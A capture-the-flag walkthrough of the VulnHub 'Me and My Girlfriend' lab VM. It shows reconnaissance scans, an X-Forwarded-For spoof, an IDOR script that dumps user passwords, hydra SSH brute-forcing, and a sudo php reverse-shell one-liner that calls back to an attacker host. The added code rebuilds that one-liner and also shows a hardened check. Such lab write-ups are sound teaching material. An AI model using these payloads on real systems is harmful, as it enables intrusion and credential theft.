Target description
Description: This VM tells us that there are a couple of lovers, namely Alice and Bob, where the couple was originally very romantic, but since Alice worked at a private company, "Ceban Corp", something has changed in Alice's attitude towards Bob, like something is "hidden", and Bob asks for your help to get what Alice is hiding and get full access to the company!
Difficulty Level: Beginner
Notes: there are 2 flag files
Learning: Web Application | Simple Privilege Escalation
Target URL
https://www.vulnhub.com/entry/me-and-my-girlfriend-1,409/
Walkthrough
Information gathering
Finding the target with fscan
.\fscan64.exe -h 192.168.1.0/24
start infoscan
(icmp) Target 192.168.1.53 is alive
(icmp) Target 192.168.1.105 is alive
(icmp) Target 192.168.1.103 is alive
(icmp) Target 192.168.1.1 is alive
[*] Icmp alive hosts len is: 4
192.168.1.103:80 open
192.168.1.105:139 open
192.168.1.53:22 open
192.168.1.105:135 open
192.168.1.105:443 open
192.168.1.1:80 open
192.168.1.103:22 open
192.168.1.105:3306 open
192.168.1.105:445 open
192.168.1.105:7000 open
192.168.1.105:8000 open
192.168.1.105:7680 open
The target is 192.168.1.103 (only 22 and 80 open; the other hosts are the attacker box and lab machines).
nmap scan
$ nmap -sT -sV -A 192.168.1.103 -oA me
Starting Nmap 7.92 ( https://nmap.org ) at 2023-01-08 17:34 CST
Nmap scan report for 192.168.1.103
Host is up (0.00034s latency).
Not shown: 998 closed tcp ports (conn-refused)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 6.6.1p1 Ubuntu 2ubuntu2.13 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 1024 57:e1:56:58:46:04:33:56:3d:c3:4b:a7:93:ee:23:16 (DSA)
| 2048 3b:26:4d:e4:a0:3b:f8:75:d9:6e:15:55:82:8c:71:97 (RSA)
| 256 8f:48:97:9b:55:11:5b:f1:6c:1d:b3:4a:bc:36:bd:b0 (ECDSA)
|_ 256 d0:c3:02:a1:c4:c2:a8:ac:3b:84:ae:8f:e5:79:66:76 (ED25519)
80/tcp open http Apache httpd 2.4.7 ((Ubuntu))
|_http-server-header: Apache/2.4.7 (Ubuntu)
|_http-title: Site doesn't have a title (text/html).
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 6.64 seconds
zsh: segmentation fault nmap -sT -sV -A 192.168.1.103 -oA me
Directory scan
$ gobuster dir -u http://192.168.1.103/ -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
===============================================================
Gobuster v3.1.0
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://192.168.1.103/
[+] Method: GET
[+] Threads: 10
[+] Wordlist: /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.1.0
[+] Timeout: 10s
===============================================================
2023/01/08 17:37:04 Starting gobuster in directory enumeration mode
===============================================================
/misc (Status: 301) [Size: 312] [--> http://192.168.1.103/misc/]
/config (Status: 301) [Size: 314] [--> http://192.168.1.103/config/]
/server-status (Status: 403) [Size: 293]
Progress: 180146 / 220561 (81.68%) ^C
[!] Keyboard interrupt detected, terminating.
===============================================================
2023/01/08 17:37:24 Finished
Bypassing the local-access restriction
Visiting the homepage shows that the site only allows local access.
Add the header X-Forwarded-For: 127.0.0.1 to every request (an X-Forwarded-For browser extension does this) and the restriction is bypassed: the server decides "local or not" from a client-supplied header instead of from the real peer address.
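The reason the header trick works, as an added example that is not code from the original write-up and not the target's PHP (which the page does not show): the vulnerable check is an assumed reconstruction of the pattern being exploited, placed beside a hardened version that only honours X-Forwarded-For when the TCP peer is a known reverse proxy. The request is modelled as (peer address, header dict); the proxy address 10.0.0.2 used in the test is a placeholder.

```python
# Added example, not code from the original write-up. The target's PHP check is not
# shown on the page; the two functions below are an assumed reconstruction of the
# pattern being exploited, with a request modelled as (peer address, header dict).

LOCAL = {"127.0.0.1", "::1"}


def client_ip_from_xff(xff):
    """First hop of an X-Forwarded-For list, i.e. whatever the client claimed."""
    return xff.split(",")[0].strip()


def is_local_vulnerable(remote_addr, headers):
    """Trusts a client-supplied X-Forwarded-For, which is what the bypass relies on."""
    xff = headers.get("X-Forwarded-For")
    client = client_ip_from_xff(xff) if xff else remote_addr
    return client in LOCAL


def is_local_hardened(remote_addr, headers, trusted_proxies=frozenset()):
    """Only the TCP peer address decides, unless the peer is a known reverse proxy.

    A proxy appends the address it saw to X-Forwarded-For, so only the last
    element was written by something we trust; earlier ones are client input.
    """
    if remote_addr in LOCAL:
        return True
    if remote_addr in trusted_proxies:
        hops = [h.strip() for h in headers.get("X-Forwarded-For", "").split(",") if h.strip()]
        return bool(hops) and hops[-1] in LOCAL
    return False


if __name__ == "__main__":
    # Constructed request: the attacker at 192.168.1.53 adds the spoofed header,
    # exactly what the browser extension does.
    spoofed = {"X-Forwarded-For": "127.0.0.1"}
    print("vulnerable:", is_local_vulnerable("192.168.1.53", spoofed))  # True
    print("hardened:  ", is_local_hardened("192.168.1.53", spoofed))    # False
```

The check worth remembering: any header the application reads to identify the client (X-Forwarded-For, X-Real-IP, Client-IP) is attacker-controlled unless a proxy you control strips or overwrites it before the request reaches the application.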
Horizontal privilege escalation (IDOR)
The site has login and registration pages; register a user.
Open the profile page and view the page source: the password is present in the form's value attribute.
Change the user_id parameter to check whether other users' passwords can be read.
Setting user_id=1 returns the account name and password of user 1: the profile page never checks that the requested id belongs to the logged-in session.
Run a script to dump every user:
import re
import requests

# X-Forwarded-For: 127.0.0.1 defeats the "local access only" check;
# PHPSESSID is the session cookie of the account we registered (use your own).
headers = {'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36',
           'x-forwarded-for': '127.0.0.1'}
cookie = {'PHPSESSID': '7mk2k1p77qr6t1gf9ba25k6hp5'}

def getUserInfo(id):
    """Fetch profile user_id=<id> (no ownership check: IDOR) and scrape the pre-filled form values."""
    r = requests.get(url="http://192.168.1.103/index.php?page=profile&user_id=%s" % id,
                     headers=headers, cookies=cookie).text
    values = []
    for pattern in (r'id="name"\svalue="(.*?)">', r'username"\svalue="(.*?)"', r'password"\svalue="(.*?)"'):
        m = re.search(pattern, r)
        values.append(m.group(1) if m else None)  # None when the id does not exist
    return tuple(values)

for i in range(15):
    name, username, password = getUserInfo(str(i))
    if name:
        print(username + ":" + password)  # login:password, the format hydra -C expects
Brute-forcing SSH with hydra
Save the dumped login:password pairs to a file and feed it to hydra with -C, which tries each pair once against SSH:
hydra -C userinfo ssh://192.168.1.103
Log in over SSH with the working credentials and read flag1.txt.
Privilege escalation
Check what the current user may run via sudo:
sudo -l
php can be run through sudo without a password (NOPASSWD), and php -r executes arbitrary code.
php reverse shell: start a listener on the attacker host (192.168.1.53), then run the one-liner on the target:
nc -lnvp 9001
sudo php -r '$sock=fsockopen("192.168.1.53",9001);exec("/bin/bash -i <&3 >&3 2>&3");'
Read flag2.txt.
Later on, missing each other also became the way of the world.
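The privilege-escalation step above is a manual read of sudo -l followed by a known interpreter escape. As an added example, not from the original write-up, the script below parses sudo -l output, flags entries that run a shell-capable binary as root, and rebuilds the write-up's php one-liner. The sudo -l sample is constructed (the page does not reproduce the box's real output; the user name lowpriv and host name target are placeholders), and the list of shell-capable binaries is an assumed subset of the usual GTFOBins candidates.

```python
import os
import re

# Added example, not part of the original write-up. Parses `sudo -l` output and flags
# entries that hand out a root shell. The sample below is constructed; the box's real
# output is not reproduced on the page, and the user name / host name are placeholders.
SAMPLE_SUDO_L = """\
Matching Defaults entries for lowpriv on target:
    env_reset, mail_badpass, secure_path=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin

User lowpriv may run the following commands on target:
    (root) NOPASSWD: /usr/bin/php
    (root) /usr/bin/apt-get
"""

# Binaries that can spawn a shell or run arbitrary code when executed under sudo
# (a hand-picked subset of the usual GTFOBins candidates, assumed for this example).
SHELL_CAPABLE = {
    "php", "python", "python3", "perl", "ruby", "bash", "sh",
    "vim", "vi", "less", "more", "find", "awk", "env", "nmap",
}

# "(runas) [TAG: ...] command[, command]"  e.g. "(root) NOPASSWD: /usr/bin/php"
RULE_RE = re.compile(r"^\s*\(([^)]+)\)\s*((?:[A-Z]+:\s*)*)(.+)$")


def parse_sudo_l(text):
    """Return one dict per command from the 'may run the following commands' block."""
    rules = []
    in_rules = False
    for line in text.splitlines():
        if line.startswith("User ") and "may run" in line:
            in_rules = True
            continue
        if not in_rules:
            continue
        m = RULE_RE.match(line)
        if not m:
            continue
        runas, tags, cmds = m.groups()
        for cmd in cmds.split(","):
            cmd = cmd.strip()
            binary = os.path.basename(cmd.split()[0])
            rules.append({
                "runas": runas.strip(),
                "nopasswd": "NOPASSWD:" in tags,
                "command": cmd,
                "shell_capable": cmd == "ALL" or binary in SHELL_CAPABLE,
            })
    return rules


def escalation_candidates(text):
    """Rules that run as root (or ALL) through a binary that can spawn a shell."""
    out = []
    for r in parse_sudo_l(text):
        user_part = r["runas"].split(":")[0].strip()
        if user_part in ("root", "ALL") and r["shell_capable"]:
            out.append(r)
    return out


def php_reverse_shell(lhost, lport):
    """The write-up's one-liner: fsockopen() returns the socket as fd 3 (assumed:
    php has nothing else open beyond stdin/stdout/stderr), and bash is wired to it."""
    return ("sudo php -r '$sock=fsockopen(\"%s\",%d);"
            "exec(\"/bin/bash -i <&3 >&3 2>&3\");'" % (lhost, lport))


if __name__ == "__main__":
    for r in escalation_candidates(SAMPLE_SUDO_L):
        tag = "NOPASSWD" if r["nopasswd"] else "password required"
        print("%s as %s (%s)" % (r["command"], r["runas"], tag))
    print(php_reverse_shell("192.168.1.53", 9001))
```

Two caveats a practitioner should keep in mind: a password-protected rule is still a candidate when you already hold the user's password (as here, from the IDOR dump), and the `<&3` redirection only works if the socket really is fd 3; if the shell does not come back, check with `ls -l /proc/self/fd` inside a php -r call or use a php payload that obtains the socket's fd explicitly.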